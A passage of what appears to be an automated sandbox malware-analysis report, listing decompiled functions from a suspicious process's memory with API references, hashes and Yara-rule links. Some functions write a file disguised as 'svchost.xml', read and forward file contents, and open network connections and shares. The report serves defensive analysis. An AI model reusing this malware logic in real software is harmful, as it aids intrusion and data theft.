                                                0x02868dc8
                                                0x02868dc2
                                                0x02868c76
                                                0x02868c67
                                                0x00000000
                                                0x02868c59
                                                0x02868dca
                                                0x02868dce
                                                0x02868dde
                                                0x02868de1
                                                0x02868de7
                                                0x02868de7
                                                0x02868bfb
                                                0x02868bfd
                                                0x02868c03
                                                0x00000000
                                                0x02868c05
                                                0x02868c09
                                                0x02868c0f
                                                0x00000000
                                                0x00000000
                                                0x02868c0f
                                                0x02868c03
                                                0x02868bea
                                                0x02868bee
                                                0x02868bee
                                                0x02868ded
                                                0x02868df0
                                                0x02868df9
                                                0x02868e08

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?,00000000), ref: 02868CE3
                                                • EnterCriticalSection.KERNEL32(?), ref: 02868CF4
                                                • LeaveCriticalSection.KERNEL32(?,00000400), ref: 02868D11
                                                • EnterCriticalSection.KERNEL32(?), ref: 02868D1B
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Enter$InitializeLeave
                                                • String ID:
                                                • API String ID: 2951591641-0
                                                • Opcode ID: 4c2aae1e6f4cf7256257a4fdd6b3025f1b8738022a442526c7b2cf163d4c76b6
                                                • Instruction ID: e7fc82af24160bfa82adfb7ac1d5ede1356d43b1b7cdf5e385079120359614ff
                                                • Opcode Fuzzy Hash: 4c2aae1e6f4cf7256257a4fdd6b3025f1b8738022a442526c7b2cf163d4c76b6
                                                • Instruction Fuzzy Hash: D46162BDE002099BCB14DFA8D898BBEBBB6FF45314F144519E519E7280DB34A909CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 028688D0 Relevance: 13.6, APIs: 9, Instructions: 94filesleepmemoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E028688D0(intOrPtr* __ecx) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				struct _SECURITY_ATTRIBUTES* _t34;
				CHAR* _t36;
				void* _t37;
				intOrPtr _t39;
				intOrPtr* _t41;
				void* _t43;
				struct _SECURITY_ATTRIBUTES* _t44;
				long _t45;

				_t44 = 0;
				_t36 = __ecx + 0x110;
				_v8 = __ecx;
				_t43 = CreateFileA(_t36, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t43 != 0xffffffff) {
					L3:
					_t39 = _v8;
					_t4 = _t39 + 8; // 0x2868e40
					_t5 = _t39 + 0xc; // 0x2868ec0
					_t45 =  *_t5;
					_v12 =  *_t4;
					SetFilePointer(_t43, _t45,  &_v12, 0);
					_t37 = LocalAlloc(0x40, 0x19000);
					_t9 = _t37 + 9; // 0x9
					 *_t37 = 0x33;
					 *((intOrPtr*)(_t37 + 1)) = _v12;
					 *(_t37 + 5) = _t45;
					_v16 = 0;
					ReadFile(_t43, _t9, 0x18ff7,  &_v16, 0);
					CloseHandle(_t43);
					_t27 = _v16;
					_t41 = _v8;
					if(_v16 == 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t41)) + 0x18))();
						return LocalFree(_t37);
					}
					E02868A40(_t41, _t27 + 9, _t37, _t27 + 9);
					return LocalFree(_t37);
				} else {
					while(1) {
						_t34 = _t44;
						_t44 =  &(_t44->nLength);
						if(_t34 > 0xa) {
							break;
						}
						Sleep(0x12c);
						_t43 = CreateFileA(_t36, 0x80000000, 1, 0, 3, 0x80, 0);
						if(_t43 == 0xffffffff) {
							continue;
						} else {
							goto L3;
						}
						goto L7;
					}
					return _t34;
				}
				L7:
			}














                                                0x028688d9
                                                0x028688e8
                                                0x028688ee
                                                0x028688fd
                                                0x02868902
                                                0x0286893b
                                                0x0286893b
                                                0x02868940
                                                0x02868943
                                                0x02868943
                                                0x02868946
                                                0x0286894f
                                                0x02868962
                                                0x0286896f
                                                0x02868972
                                                0x02868979
                                                0x0286897c
                                                0x02868980
                                                0x02868987
                                                0x0286898e
                                                0x02868994
                                                0x02868997
                                                0x0286899c
                                                0x028689ba
                                                0x00000000
                                                0x028689be
                                                0x028689a3
                                                0x028689b5
                                                0x02868904
                                                0x02868904
                                                0x02868904
                                                0x02868906
                                                0x0286890a
                                                0x00000000
                                                0x00000000
                                                0x02868915
                                                0x02868934
                                                0x02868939
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02868939
                                                0x028689ca
                                                0x028689ca
                                                0x00000000

                                                APIs
                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,02884635,?,02868D80), ref: 028688F7
                                                • Sleep.KERNEL32(0000012C,?,02868D80), ref: 02868915
                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,02868D80), ref: 0286892E
                                                • SetFilePointer.KERNEL32(00000000,02868EC0,02868D80,00000000,?,02868D80), ref: 0286894F
                                                • LocalAlloc.KERNEL32(00000040,00019000,?,02868D80), ref: 0286895C
                                                • ReadFile.KERNEL32(00000000,00000009,00018FF7,?,00000000), ref: 02868987
                                                • CloseHandle.KERNEL32(00000000), ref: 0286898E
                                                • LocalFree.KERNEL32(00000000,00000000,-00000009), ref: 028689A9
                                                • LocalFree.KERNEL32(00000000), ref: 028689BE
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: File$Local$CreateFree$AllocCloseHandlePointerReadSleep
                                                • String ID:
                                                • API String ID: 2044486136-0
                                                • Opcode ID: cf155d13d74f3660d6643ed024228137677682ed7ec930f444f4a8ea49f1b4a0
                                                • Instruction ID: 52beefca6c54ec9ca0159b1986021138fb2cb6501e18b1c94f026b40f3bb2132
                                                • Opcode Fuzzy Hash: cf155d13d74f3660d6643ed024228137677682ed7ec930f444f4a8ea49f1b4a0
                                                • Instruction Fuzzy Hash: 2B31C87DA80204BFD710DB68DC89FBA7B7CEB09721F104555FA09EB2C0D6749511CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02868A40 Relevance: 10.6, APIs: 7, Instructions: 119COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E02868A40(void* __ecx, void* __eflags, intOrPtr _a4, char _a8) {
				long _v8;
				char _v16;
				char _v20;
				struct _CRITICAL_SECTION _v44;
				long _v48;
				long _v52;
				void* _v56;
				char _v60;
				signed int _t45;
				char _t53;
				void* _t60;
				void* _t84;
				void* _t96;
				void* _t100;
				signed int _t102;

				_push(0xffffffff);
				_push(E028846F8);
				_push( *[fs:0x0]);
				_t45 =  *0x288f008; // 0xe7fe870c
				_push(_t45 ^ _t102);
				 *[fs:0x0] =  &_v16;
				_t96 = __ecx;
				_v60 = 0x288cab8;
				_v48 = 0;
				_v56 = 0;
				_v52 = 0;
				InitializeCriticalSection( &_v44);
				_v8 = 0;
				EnterCriticalSection( &_v44);
				_v52 = _v56;
				E02868840( &_v60, 0x400);
				LeaveCriticalSection( &_v44);
				_t53 = _a8;
				if(_t53 == 0 || _a4 == 0) {
					EnterCriticalSection( &_v44);
					_t28 = ( ==  ? 0 : _v52 - _v56) + 5; // 0x5
					if(E028687B0( &_v60, _t28) != 0xffffffff) {
						_t31 = _t96 + 0x214; // 0x2a0073
						 *_v52 =  *_t31;
						_t33 = _t96 + 0x218; // 0x0
						 *((char*)(_v52 + 4)) =  *_t33;
						_v52 = _v52 + 5;
					}
					LeaveCriticalSection( &_v44);
				} else {
					_v20 = _t53 + 0xd;
					_t17 = _t96 + 0x214; // 0x288cccc
					E02868690( &_v60, _t17, 5);
					E02868690( &_v60,  &_v20, 4);
					E02868690( &_v60,  &_a8, 4);
					E02868690( &_v60, _a4, _a8);
				}
				_t82 =  ==  ? 0 : _v52 - _v56;
				_push( ==  ? 0 : _v52 - _v56);
				_t60 = E028689D0(_t96, _v56,  ==  ? 0 : _v52 - _v56);
				_t84 = _v56;
				_t100 = _t60;
				_v60 = 0x288cab8;
				if(_t84 != 0) {
					VirtualFree(_t84, 0, 0x8000);
				}
				DeleteCriticalSection( &_v44);
				 *[fs:0x0] = _v16;
				return _t100;
			}


















                                                0x02868a43
                                                0x02868a45
                                                0x02868a50
                                                0x02868a56
                                                0x02868a5d
                                                0x02868a61
                                                0x02868a67
                                                0x02868a6c
                                                0x02868a74
                                                0x02868a7b
                                                0x02868a82
                                                0x02868a89
                                                0x02868a92
                                                0x02868a9a
                                                0x02868aab
                                                0x02868aae
                                                0x02868abd
                                                0x02868abf
                                                0x02868ac4
                                                0x02868b13
                                                0x02868b28
                                                0x02868b37
                                                0x02868b3c
                                                0x02868b42
                                                0x02868b47
                                                0x02868b4d
                                                0x02868b50
                                                0x02868b50
                                                0x02868b58
                                                0x02868acc
                                                0x02868ad2
                                                0x02868ad5
                                                0x02868ade
                                                0x02868aec
                                                0x02868afa
                                                0x02868b08
                                                0x02868b08
                                                0x02868b66
                                                0x02868b69
                                                0x02868b6e
                                                0x02868b73
                                                0x02868b76
                                                0x02868b78
                                                0x02868b81
                                                0x02868b8b
                                                0x02868b8b
                                                0x02868b95
                                                0x02868ba0
                                                0x02868bad

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?), ref: 02868A89
                                                • EnterCriticalSection.KERNEL32(?), ref: 02868A9A
                                                • LeaveCriticalSection.KERNEL32(?,00000400), ref: 02868ABD
                                                • EnterCriticalSection.KERNEL32(?), ref: 02868B13
                                                • LeaveCriticalSection.KERNEL32(?,00000005), ref: 02868B58
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00000000), ref: 02868B8B
                                                • DeleteCriticalSection.KERNEL32(?,00000000,00000000,00000000), ref: 02868B95
                                                  • Part of subcall function 02868690: EnterCriticalSection.KERNEL32(?,?,?,?,?,02868C1E,?,02867B57,E7FE870C,73B76490,00000000,?), ref: 0286869C
                                                  • Part of subcall function 02868690: LeaveCriticalSection.KERNEL32(?,?,?,02868C1E,?,02867B57,E7FE870C,73B76490,00000000,?), ref: 028686C5
                                                  • Part of subcall function 02868690: LeaveCriticalSection.KERNEL32(?,73B76490,00000000,?,?,?,?,?,?,?,?,?,02884728,000000FF,?,02867B57), ref: 028686E7
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Leave$Enter$DeleteFreeInitializeVirtual
                                                • String ID:
                                                • API String ID: 2514474324-0
                                                • Opcode ID: 715171d940395fe83687cbf0d5ba38276d88e7def1c0ae272999ec0adca98522
                                                • Instruction ID: 9f5e41c2a6d2c245e3e47836655381ded6c56990dceb3a6d9847c3d956b51094
                                                • Opcode Fuzzy Hash: 715171d940395fe83687cbf0d5ba38276d88e7def1c0ae272999ec0adca98522
                                                • Instruction Fuzzy Hash: 0941EF79A00209ABDF04DFA8D898BEEBBB9FF18314F15451AF519E7280DB74A508CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02873060 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 68%
                                                			E02873060(void* __ebx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				WCHAR* _v36;
				struct HINSTANCE__* _v40;
				void* __edi;
				void* __esi;
				void* _t54;
				long _t56;
				signed int _t62;
				intOrPtr _t63;
				void* _t64;
				intOrPtr _t67;
				long _t69;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t76;
				char _t78;
				void* _t90;
				intOrPtr _t91;
				WCHAR* _t93;
				intOrPtr _t96;
				long _t98;
				intOrPtr* _t100;
				void* _t103;
				void* _t104;
				void* _t110;

				_t72 = _a8;
				_push(_t90);
				_v5 = 0;
				_t96 = _t72 + 0x10;
				_push(_t96);
				_v16 = 1;
				_v20 = _t96;
				_v12 =  *(_t72 + 8) ^  *0x288f008;
				_t54 = E02873020(_t90, _t96,  *(_t72 + 8) ^  *0x288f008);
				_t91 = _a12;
				_push(_t91);
				E02871802(_t54);
				_t56 = _a4;
				_t104 = _t103 + 0xc;
				if(( *(_t56 + 4) & 0x00000066) != 0) {
					__eflags =  *((intOrPtr*)(_t72 + 0xc)) - 0xfffffffe;
					if( *((intOrPtr*)(_t72 + 0xc)) != 0xfffffffe) {
						E02874097(_t72, 0xfffffffe, _t96, 0x288f008);
						goto L18;
					}
					goto L19;
				} else {
					_v32 = _t56;
					_v28 = _t91;
					_t91 =  *((intOrPtr*)(_t72 + 0xc));
					 *((intOrPtr*)(_t72 - 4)) =  &_v32;
					if(_t91 == 0xfffffffe) {
						L19:
						return _v16;
					} else {
						do {
							_t76 = _v12;
							_t19 = _t91 + 2; // 0x3
							_t62 = _t91 + _t19 * 2;
							_t74 =  *((intOrPtr*)(_t76 + _t62 * 4));
							_t63 = _t76 + _t62 * 4;
							_t77 =  *((intOrPtr*)(_t63 + 4));
							_v24 = _t63;
							if( *((intOrPtr*)(_t63 + 4)) == 0) {
								_t78 = _v5;
								goto L12;
							} else {
								_t64 = E0287404E(_t77, _t96);
								_t78 = 1;
								_v5 = 1;
								_t110 = _t64;
								if(_t110 < 0) {
									_v16 = 0;
									L18:
									_push(_t96);
									E02873020(_t91, _t96, _v12);
									goto L19;
								} else {
									if(_t110 <= 0) {
										goto L12;
									} else {
										_t65 = _a4;
										if( *_a4 == 0xe06d7363) {
											_t112 =  *0x28855dc;
											if( *0x28855dc != 0) {
												_t65 = E02883930(_t112, 0x28855dc);
												_t104 = _t104 + 4;
												if(_t65 != 0) {
													_t100 =  *0x28855dc; // 0x2871e94
													L0287162B();
													_t65 =  *_t100(_a4, 1);
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
											}
										}
										E0287407E(_t65, _a8, _a4);
										_t67 = _a8;
										if( *((intOrPtr*)(_t67 + 0xc)) != _t91) {
											E02874097(_t67, _t91, _t96, 0x288f008);
											_t67 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t67 + 0xc)) = _t74;
										E02873020(_t91, _t96, _v12);
										E02874065();
										asm("int3");
										_push(_t96);
										_t98 = _v32;
										_push(_t91);
										_t93 = _v36;
										_t69 = GetModuleFileNameW(_v40, _t93, _t98);
										if(_t98 != 0) {
											if(_t69 == 0) {
												 *_t93 = 0;
											}
											if(_t69 == _t98) {
												_t69 = GetLastError();
												if(_t69 == 0) {
													 *(_t93 + _t98 * 2 - 2) = _t69;
												}
											}
										}
										return _t69;
									}
								}
							}
							goto L29;
							L12:
							_t91 = _t74;
							__eflags = _t74 - 0xfffffffe;
						} while (_t74 != 0xfffffffe);
						__eflags = _t78;
						if(_t78 != 0) {
							goto L18;
						}
						goto L19;
					}
				}
				L29:
			}


































                                                0x02873067
                                                0x0287306b
                                                0x0287306c
                                                0x02873073
                                                0x0287307c
                                                0x0287307e
                                                0x02873085
                                                0x02873088
                                                0x0287308b
                                                0x02873090
                                                0x02873093
                                                0x02873094
                                                0x02873099
                                                0x0287309c
                                                0x028730a3
                                                0x0287315d
                                                0x02873161
                                                0x02873170
                                                0x00000000
                                                0x02873170
                                                0x00000000
                                                0x028730a9
                                                0x028730a9
                                                0x028730af
                                                0x028730b2
                                                0x028730b5
                                                0x028730bb
                                                0x02873181
                                                0x0287318a
                                                0x028730c1
                                                0x028730c1
                                                0x028730c1
                                                0x028730c4
                                                0x028730c7
                                                0x028730ca
                                                0x028730cd
                                                0x028730d0
                                                0x028730d3
                                                0x028730d8
                                                0x02873140
                                                0x00000000
                                                0x028730da
                                                0x028730dc
                                                0x028730e1
                                                0x028730e3
                                                0x028730e6
                                                0x028730e8
                                                0x02873154
                                                0x02873175
                                                0x02873175
                                                0x02873179
                                                0x00000000
                                                0x028730ea
                                                0x028730ea
                                                0x00000000
                                                0x028730ec
                                                0x028730ec
                                                0x028730f5
                                                0x028730f7
                                                0x028730fe
                                                0x02873105
                                                0x0287310a
                                                0x0287310f
                                                0x02873111
                                                0x0287311e
                                                0x02873123
                                                0x02873125
                                                0x02873128
                                                0x02873128
                                                0x0287310f
                                                0x028730fe
                                                0x02873131
                                                0x02873136
                                                0x0287313c
                                                0x02873195
                                                0x0287319a
                                                0x0287319a
                                                0x0287319d
                                                0x028731a1
                                                0x028731a4
                                                0x028731b4
                                                0x028731b9
                                                0x028731bd
                                                0x028731be
                                                0x028731c1
                                                0x028731c2
                                                0x028731ca
                                                0x028731d2
                                                0x028731d6
                                                0x028731da
                                                0x028731da
                                                0x028731df
                                                0x028731e1
                                                0x028731e9
                                                0x028731eb
                                                0x028731eb
                                                0x028731e9
                                                0x028731df
                                                0x028731f3
                                                0x028731f3
                                                0x028730ea
                                                0x028730e8
                                                0x00000000
                                                0x02873143
                                                0x02873143
                                                0x02873145
                                                0x02873145
                                                0x0287314e
                                                0x02873150
                                                0x00000000
                                                0x02873152
                                                0x00000000
                                                0x02873150
                                                0x028730bb
                                                0x00000000

                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 0287308B
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 02873105
                                                  • Part of subcall function 02883930: __FindPESection.LIBCMT ref: 02883989
                                                • _ValidateLocalCookies.LIBCMT ref: 02873179
                                                • _ValidateLocalCookies.LIBCMT ref: 028731A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
                                                • String ID: csm
                                                • API String ID: 1685366865-1018135373
                                                • Opcode ID: f6b3637652acb929650ba643a894dd4082131caf820600ca389c2d705eb30407
                                                • Instruction ID: 287dc06842a97527f322fa151c407895ea061feacf9231173d1582de3e4a5803
                                                • Opcode Fuzzy Hash: f6b3637652acb929650ba643a894dd4082131caf820600ca389c2d705eb30407
                                                • Instruction Fuzzy Hash: 5541B73DE00208ABCF10DF6CC884A9EBBB5AF45328F148195E819EB351D735DA55DFA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 028672D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 69%
                                                			E028672D0(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v268;
				void _v102668;
				long _v102672;
				void* __esi;
				signed int _t16;
				intOrPtr _t26;
				int _t33;
				void* _t39;
				void* _t43;
				intOrPtr _t50;
				void* _t51;
				void* _t55;
				intOrPtr* _t56;
				long _t57;
				void* _t58;
				void* _t59;
				signed int _t60;

				E02883CA0();
				_t16 =  *0x288f008; // 0xe7fe870c
				_v8 = _t16 ^ _t60;
				_t50 = _a4;
				_t39 = __edx;
				_t55 = __ecx;
				E02873440(_t50,  &_v268, 0, 0x104);
				E02865180( &_v268, 0x104, "%s\\svchost.xml", _t55);
				E02873440(_t50,  &_v102668, 0, 0x19000);
				_push(_t50);
				E02865180( &_v102668, 0x19000,  *0x289682c, _t39);
				_t56 =  &_v102668;
				_t43 = _t56 + 1;
				do {
					_t26 =  *_t56;
					_t56 = _t56 + 1;
				} while (_t26 != 0);
				_v102672 = 0;
				_t57 = _t56 - _t43;
				_t51 = CreateFileA( &_v268, 0x40000000, 2, 0, 2, 0x80, 0);
				if(_t51 == 0) {
					L5:
					_pop(_t58);
					return E02870A5D(_v8 ^ _t60, _t58);
				} else {
					_t33 = WriteFile(_t51,  &_v102668, _t57,  &_v102672, 0);
					_push(_t51);
					if(_t33 != 0) {
						CloseHandle();
						_pop(_t59);
						return E02870A5D(_v8 ^ _t60, _t59);
					} else {
						CloseHandle();
						goto L5;
					}
				}
			}





















                                                0x028672d8
                                                0x028672dd
                                                0x028672e4
                                                0x028672ea
                                                0x028672fb
                                                0x028672fd
                                                0x028672ff
                                                0x02867316
                                                0x02867329
                                                0x0286732e
                                                0x02867342
                                                0x02867347
                                                0x02867350
                                                0x02867353
                                                0x02867353
                                                0x02867355
                                                0x02867356
                                                0x02867372
                                                0x0286737d
                                                0x02867385
                                                0x02867389
                                                0x028673ae
                                                0x028673af
                                                0x028673c0
                                                0x0286738b
                                                0x0286739d
                                                0x028673a3
                                                0x028673a6
                                                0x028673c1
                                                0x028673cd
                                                0x028673d9
                                                0x028673a8
                                                0x028673a8
                                                0x00000000
                                                0x028673a8
                                                0x028673a6

                                                APIs
                                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0286737F
                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0286739D
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,02867878,WIN72K8R2), ref: 028673A8
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,02867878,WIN72K8R2), ref: 028673C1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle$CreateWrite
                                                • String ID: %s\svchost.xml
                                                • API String ID: 3602564925-772174823
                                                • Opcode ID: d63bb419989771cf0bbfe9925af315d1488411525d224decd5d83032228df973
                                                • Instruction ID: d735c364688b20b72d4bb5033d52d31a5c40495dfefea833e11908b721f5eed6
                                                • Opcode Fuzzy Hash: d63bb419989771cf0bbfe9925af315d1488411525d224decd5d83032228df973
                                                • Instruction Fuzzy Hash: BB210A7DA80218BBDB20DA68DC49FEAB37DDB45704F4400D5FA48E7180DA76A9C48F61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 028790F8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 71%
                                                			E028790F8(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x2890558; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E028778D0(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E02877F1D(_t25, __eflags,  *0x2890558, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E02878F6A(_t25, _t31, 0x2896690);
							E02877848(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E02877848();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E02877805(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x2890558; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E028778D0(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E02877F1D(_t27, __eflags,  *0x2890558, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E02878F6A(_t27, _t32, 0x2896690);
									E02877848(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E02877848();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E02877EC7(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E02877EC7(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                                0x028790f8
                                                0x028790f8
                                                0x028790f8
                                                0x02879102
                                                0x02879104
                                                0x02879109
                                                0x0287910c
                                                0x0287911a
                                                0x02879121
                                                0x02879126
                                                0x02879129
                                                0x0287912c
                                                0x0287913e
                                                0x02879143
                                                0x02879145
                                                0x02879150
                                                0x02879157
                                                0x0287915c
                                                0x0287915f
                                                0x02879161
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02879147
                                                0x02879147
                                                0x00000000
                                                0x02879147
                                                0x0287912e
                                                0x0287912e
                                                0x0287912f
                                                0x0287912f
                                                0x02879134
                                                0x0287916f
                                                0x02879170
                                                0x02879176
                                                0x0287917b
                                                0x0287917e
                                                0x0287917f
                                                0x02879180
                                                0x02879187
                                                0x02879189
                                                0x0287918b
                                                0x02879190
                                                0x02879193
                                                0x028791a1
                                                0x028791ad
                                                0x028791b0
                                                0x028791b3
                                                0x028791c5
                                                0x028791ca
                                                0x028791cc
                                                0x028791d7
                                                0x028791dd
                                                0x028791e5
                                                0x028791e7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x028791ce
                                                0x028791ce
                                                0x00000000
                                                0x028791ce
                                                0x028791b5
                                                0x028791b5
                                                0x028791b6
                                                0x028791b6
                                                0x028791e9
                                                0x028791ea
                                                0x028791ea
                                                0x02879195
                                                0x0287919b
                                                0x0287919f
                                                0x028791f2
                                                0x028791f3
                                                0x028791f9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0287919f
                                                0x02879200
                                                0x02879200
                                                0x0287910e
                                                0x02879114
                                                0x02879118
                                                0x02879163
                                                0x02879164
                                                0x0287916e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02879118

                                                APIs
                                                • GetLastError.KERNEL32(123,?,028749AE,?,123,?,02877670,02890E80,123,?,73B76490,123,?,77109EB0), ref: 028790FC
                                                • SetLastError.KERNEL32(00000000,123,?,73B76490,123,?,77109EB0), ref: 02879164
                                                • SetLastError.KERNEL32(00000000,123,?,73B76490,123,?,77109EB0), ref: 02879170
                                                • _abort.LIBCMT ref: 02879176
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_abort
                                                • String ID: 123
                                                • API String ID: 88804580-2286445522
                                                • Opcode ID: 375874030db38cc7d77fbccecf7c092987e80d1fa64a43fa55e97a2feebfed10
                                                • Instruction ID: c14173ee99e49433724908467890af25b8c3e8b334ff21e383a63958a51bd6e1
                                                • Opcode Fuzzy Hash: 375874030db38cc7d77fbccecf7c092987e80d1fa64a43fa55e97a2feebfed10
                                                • Instruction Fuzzy Hash: D1F0683EA8460066D612363CAC0DF2B666A9BC3775F160524F51DE62C0EF7CC821C976
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02869020 Relevance: 7.6, APIs: 5, Instructions: 66networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: connectgethostbynamehtonssocket
                                                • String ID:
                                                • API String ID: 3705698054-0
                                                • Opcode ID: e4d3b5bee106f6a5a1d291a695544c121e98e687d3417ddaeb83c3816382f277
                                                • Instruction ID: 4f3e3864d98d27072ca37dd15afaa8e28a707e84f0ace4d517a3f82341b27acd
                                                • Opcode Fuzzy Hash: e4d3b5bee106f6a5a1d291a695544c121e98e687d3417ddaeb83c3816382f277
                                                • Instruction Fuzzy Hash: D721AF3DA40209AFC711EFA8D809BAEB7B5FF55710F01015AE905EB290EB749A148BD6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286B0F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78shareCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 70%
                                                			E0286B0F0(intOrPtr* __ecx, char* __edx, void* __edi, char* _a4) {
				signed int _v8;
				char _v276;
				char _v540;
				char* _v560;
				int _v576;
				struct _NETRESOURCE _v580;
				char* _v584;
				char* _v588;
				void* __esi;
				signed int _t23;
				intOrPtr* _t26;
				char _t42;
				intOrPtr* _t51;
				void* _t56;
				long _t57;
				void* _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;
				signed int _t63;

				_t62 = (_t60 & 0xfffffff0) - 0x248;
				_t23 =  *0x288f008; // 0xe7fe870c
				_v8 = _t23 ^ _t62;
				_t51 = __ecx;
				_v584 = _a4;
